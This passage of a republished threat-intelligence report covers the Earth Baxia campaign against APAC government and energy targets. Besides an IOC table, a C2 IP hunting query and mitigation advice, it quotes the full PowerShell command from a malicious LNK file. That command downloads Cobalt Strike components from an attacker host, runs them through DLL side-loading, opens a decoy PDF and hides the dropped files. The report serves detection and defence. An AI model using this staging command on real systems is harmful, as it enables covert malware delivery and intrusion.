The combinations we know at initial access\"> <\/a> <\/p>\n<p><figcaption>Figure 13. The combinations we know at initial access<\/figcaption><\/p>\n<\/figure><\/div>\n<div class=\"richText\" readability=\"38\">\n<div class=\"responsive-table-wrap\" readability=\"21\">\n<p>While investigating the case, we came across the download site static[.]krislab[.]site in an LNK file. It executes a PowerShell command to download decoy documents and Cobalt Strike toolsets, which include Edge.exe, msedge.dll, and Logs.txt (Table 3). This toolset is similar to the one we mentioned earlier in this blog entry.<\/p>\n<p>Each zip file contains a LNK file with the following target PowerShell command (URLs defanged):<\/p>\n<p><span class=\"blockquote\">wget -Uri hxxps:\/\/static[.]krislab[.]site\/infodata\/<b>msedge.dll<\/b> -OutFile C:\\Users\\Public\\msedge.dll; wget -Uri hxxps:\/\/static[.]krislab[.]site\/infodata\/<b>Logs.txt<\/b> -OutFile C:\\Users\\Public\\Logs.txt;wget -Uri hxxps:\/\/static[.]krislab[.]site\/infodata\/<b>Edge.exe<\/b> -OutFile C:\\Users\\Public\\Edge.exe;C:\\Users\\Public\\Edge.exe;wget -Uri \"hxxps:\/\/static[.]krislab[.]site\/infodata\/<b>yn.pdf<\/b>\" -OutFile \"C:\\Users\\Public\\\u9080\u8acb\u51fd.pdf\";C:\\Windows\\System32\\cmd.exe \/c start \/b \"C:\\Users\\Public\\\u9080\u8acb\u51fd.pdf\";attrib +s +h C:\\Users\\Public\\Edge.exe;attrib +s +h C:\\Users\\Public\\Logs.txt;attrib +s +h C:\\Users\\Public\\msedge.dll<\/span><\/p>\n<p>Here wget is the PowerShell alias for Invoke-WebRequest. The command stages the three Cobalt Strike files in C:\\Users\\Public, runs Edge.exe (which side-loads msedge.dll), opens the downloaded decoy PDF for the user, and finally marks the three dropped files as system and hidden with attrib +s +h so that they do not appear in default Explorer views. The decoy is saved under a Traditional Chinese file name (\u9080\u8acb\u51fd.pdf, \u201cinvitation letter\u201d), consistent with the Invitation*.zip lures in Table 3. PowerShell script-block logging, or a rule for an LNK target that invokes Invoke-WebRequest\/wget followed by attrib +h, would catch this stage.<\/p>\n<p><center><\/p>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody readability=\"3\">\n<tr>\n<td width=\"141\" valign=\"top\"><b>Discovered Date<\/b><\/td>\n<td width=\"275\" valign=\"top\"><b>Path<\/b><\/td>\n<td width=\"208\" valign=\"top\"><b>File description<\/b><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" valign=\"top\">June 21, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation1017.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool 
set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/tw.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr>\n<td width=\"141\" valign=\"top\">June 25, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/break_1\/06.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" valign=\"top\">June 30, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation0630.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/yn.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td width=\"141\" rowspan=\"5\" valign=\"top\">July 2, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Invitation0702.zip<\/td>\n<td width=\"208\" rowspan=\"4\" valign=\"top\">Cobalt Strike tool set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/hzm.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<tr>\n<td width=\"141\" rowspan=\"4\" valign=\"top\">August 15, 2024<\/td>\n<td width=\"275\" valign=\"top\">\/infodata\/Edge.exe<\/td>\n<td width=\"208\" rowspan=\"3\" valign=\"top\">Cobalt Strike tool 
set<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/msedge.dll<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/Logs.txt<\/td>\n<\/tr>\n<tr>\n<td width=\"275\" valign=\"top\">\/infodata\/k1.pdf<\/td>\n<td width=\"208\" valign=\"top\">Decoy document<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><span class=\"rte-icon-component-text\">Table 3. Files hosted on static[.]krislab[.]site<\/span><\/center> <\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"41.083838383838\">\n<div readability=\"31.389898989899\">\n<h4><b>Trend Micro Vision One Threat Intelligence&nbsp;<\/b><\/h4>\n<p>To stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat Insights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they happen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their malicious activities, and the techniques they use. 
By leveraging this intelligence, customers can take proactive steps to protect their environments, mitigate risks, and respond effectively to threats.<\/p>\n<p><b>Trend Micro Vision One Intelligence Reports App [IOC Sweeping]<\/b><\/p>\n<ul>\n<li><span class=\"rte-red-bullet\"><i>Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC<\/i><\/span><\/li>\n<li><span class=\"rte-red-bullet\"><i>Earth Baxia: A dive into their aggressive campaign in August<\/i><\/span><\/li>\n<\/ul>\n<p><b>Trend Micro Vision One Threat Insights App<\/b><\/p>\n<h4><b>Hunting Queries<\/b><\/h4>\n<p><b>Trend Micro Vision One Search App<\/b><\/p>\n<p>Vision One customers can use the Search App to match or hunt the malicious indicators mentioned in this blog post with data in their environment.&nbsp;&nbsp;&nbsp;&nbsp;<\/p>\n<p><b>Network Communication with Earth Baxia &#8211; IP<\/b><\/p>\n<p>eventId:3 AND (src:&quot;167.172.89.142&quot; OR src:&quot;167.172.84.142&quot; OR src:&quot;152.42.243.170&quot; OR src:&quot;188.166.252.85&quot; OR dst:&quot;167.172.89.142&quot; OR dst:&quot;167.172.84.142&quot; OR dst:&quot;152.42.243.170&quot; OR dst:&quot;188.166.252.85&quot;)<\/p>\n<p>More hunting queries are available for Vision One customers with&nbsp;<a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" title=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/one-platform\/threat-insights.html\" target=\"_blank\" rel=\"noopener\">Threat Insights Entitlement enabled<\/a>.&nbsp;<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<div class=\"richText\" readability=\"43.901461988304\">\n<div readability=\"33.54269005848\">\n<h4>Conclusion<\/h4>\n<p>Earth Baxia, likely based in China, conducted a sophisticated campaign targeting government and energy sectors in multiple APAC countries. 
They used advanced techniques like GeoServer exploitation, spear-phishing, and customized malware (Cobalt Strike and EAGLEDOOR) to infiltrate and exfiltrate data. The use of public cloud services for hosting malicious files and the multi-protocol support of EAGLEDOOR highlight the complexity and adaptability of their operations.<\/p>\n<p>Continued vigilance and advanced threat detection measures are essential to counter such threats. To mitigate the risk of this kind of threat, security teams can also implement the following best practices:<\/p>\n<ul>\n<li><span class=\"rte-red-bullet\">Implement continuous phishing awareness training for employees.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Double-check the sender and subject of emails, particularly those from unfamiliar sources or with vague subjects.<\/span><\/li>\n<li><span class=\"rte-red-bullet\">Deploy multi-layered protection solutions to help detect and block threats early in the malware infection chain.<\/span><\/li>\n<\/ul>\n<p>Organizations can help protect themselves from these kinds of attacks with <a href=\"https:\/\/www.trendmicro.com\/en_us\/business\/products\/detection-response.html\" target=\"_blank\" rel=\"noopener\">Trend Vision One\u2122<\/a>, which enables security teams to continuously identify attack surfaces, including known, unknown, managed, and unmanaged cyber assets. Vision One helps organizations prioritize and address potential risks, including vulnerabilities. It considers critical factors such as the likelihood and impact of potential attacks and offers a range of prevention, detection, and response capabilities. 
The multilayered protection and behavior detection Vision One offers can help block malicious tools and services before they can inflict damage on user machines and systems.<\/p>\n<h4>Indicators of Compromise (IOCs)<\/h4>\n<p>The full list of IOCs can be found <a href=\"https:\/\/www.trendmicro.com\/content\/dam\/trendmicro\/global\/en\/research\/24\/i\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/IOCs%20-%20Earth%20Baxia%20Uses%20Spear-Phishing%20and%20GeoServer%20Exploit%20to%20Target%20APAC.txt\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<\/p><\/div>\n<\/p><\/div>\n<\/p><\/div>\n<section class=\"tag--list\">\n<p>Tags<\/p>\n<\/section>\n<p> <\/main> <\/article>\n<\/div>\n<\/div><\/div>\n<\/div>\n<p> <!-- \/* Core functionality javascripts, absolute URL to leverage Akamai CDN *\/ --> <!--For Modal-start--> <\/p>\n<p> <span>sXpIBdPeKzI9PC2p0SWMpUSM2NSxWzPyXTMLlbXmYa0R20xk<\/span> <\/p>\n<p> <!--For Modal-end--> <\/body> Read More <a href=\"https:\/\/www.trendmicro.com\/en_us\/research\/24\/i\/earth-baxia-spear-phishing-and-geoserver-exploit.html\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>We observed Earth Baxia carrying out targeted attacks against APAC countries that involved advanced techniques like spear-phishing and customized malware, with data suggesting that the group operates from China. 
Read More HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[61],"tags":[9546,9510,9577],"class_list":["post-57136","post","type-post","status-publish","format-standard","hentry","category-trendmicro","tag-trend-micro-research-apttargeted-attacks","tag-trend-micro-research-articles-news-reports","tag-trend-micro-research-phishing"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.6 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2024-09-19T00:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"12 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target 
APAC\",\"datePublished\":\"2024-09-19T00:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"},\"wordCount\":2399,\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"keywords\":[\"Trend Micro Research : APT&amp;Targeted Attacks\",\"Trend Micro Research : Articles, News, Reports\",\"Trend Micro Research : Phishing\"],\"articleSection\":[\"TrendMicro\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\",\"name\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"datePublished\":\"2024-09-19T00:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#primaryimage\",\"url\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\",\"contentUrl\":\"https:\\\/\\\/trendmicro.scene7.com\\\/is\\\/image\\\/trendmicro\\\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Trend Micro Research : APT&amp;Targeted Attacks\",\"item\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/tag\\\/trend-micro-research-apttargeted-attacks\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#website\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - 
Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/wp-content\\\/uploads\\\/2025\\\/05\\\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/logo\\\/image\\\/\"},\"sameAs\":[\"https:\\\/\\\/x.com\\\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.threatshub.org\\\/blog\\\/#\\\/schema\\\/person\\\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH 
Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","og_locale":"en_US","og_type":"article","og_title":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","og_url":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","og_site_name":"ThreatsHub Cybersecurity News","article_published_time":"2024-09-19T00:00:00+00:00","og_image":[{"url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","type":"","width":"","height":""}],"author":"TH Author","twitter_card":"summary_large_image","twitter_creator":"@threatshub","twitter_site":"@threatshub","twitter_misc":{"Written by":"TH Author","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#article","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"},"author":{"name":"TH Author","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476"},"headline":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC","datePublished":"2024-09-19T00:00:00+00:00","mainEntityOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"},"wordCount":2399,"publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","keywords":["Trend Micro Research : APT&amp;Targeted Attacks","Trend Micro Research : Articles, News, Reports","Trend Micro Research : 
Phishing"],"articleSection":["TrendMicro"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","url":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/","name":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC 2026 | ThreatsHub Cybersecurity News","isPartOf":{"@id":"https:\/\/www.threatshub.org\/blog\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage"},"thumbnailUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","datePublished":"2024-09-19T00:00:00+00:00","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.","breadcrumb":{"@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#primaryimage","url":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80","contentUrl":"https:\/\/trendmicro.scene7.com\/is\/image\/trendmicro\/Header-Earth-Baxia-Spear-Phishing-Exploits:Large?qlt=80"},{"@type":"BreadcrumbList","@id":"https:\/\/www.threatshub.org\/blog\/earth-baxia-uses-spear-phishing-and-geoserver-exploit-to-target-apac\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.threatshub.org\/blog\/"},{"@type":"ListItem","position":2,"name":"Trend Micro Research : APT&amp;Targeted Attacks","item":"https:\/\/www.threatshub.org\/blog\/tag\/trend-micro-research-apttargeted-attacks\/"},{"@type":"ListItem","position":3,"name":"Earth Baxia Uses Spear-Phishing and GeoServer Exploit to Target APAC"}]},{"@type":"WebSite","@id":"https:\/\/www.threatshub.org\/blog\/#website","url":"https:\/\/www.threatshub.org\/blog\/","name":"ThreatsHub Cybersecurity News","description":"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC 
Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform","publisher":{"@id":"https:\/\/www.threatshub.org\/blog\/#organization"},"alternateName":"Threatshub.org","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.threatshub.org\/blog\/#organization","name":"ThreatsHub.org","alternateName":"Threatshub.org","url":"https:\/\/www.threatshub.org\/blog\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/","url":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","contentUrl":"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg","width":432,"height":435,"caption":"ThreatsHub.org"},"image":{"@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/threatshub"]},{"@type":"Person","@id":"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476","name":"TH Author","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g","caption":"TH 
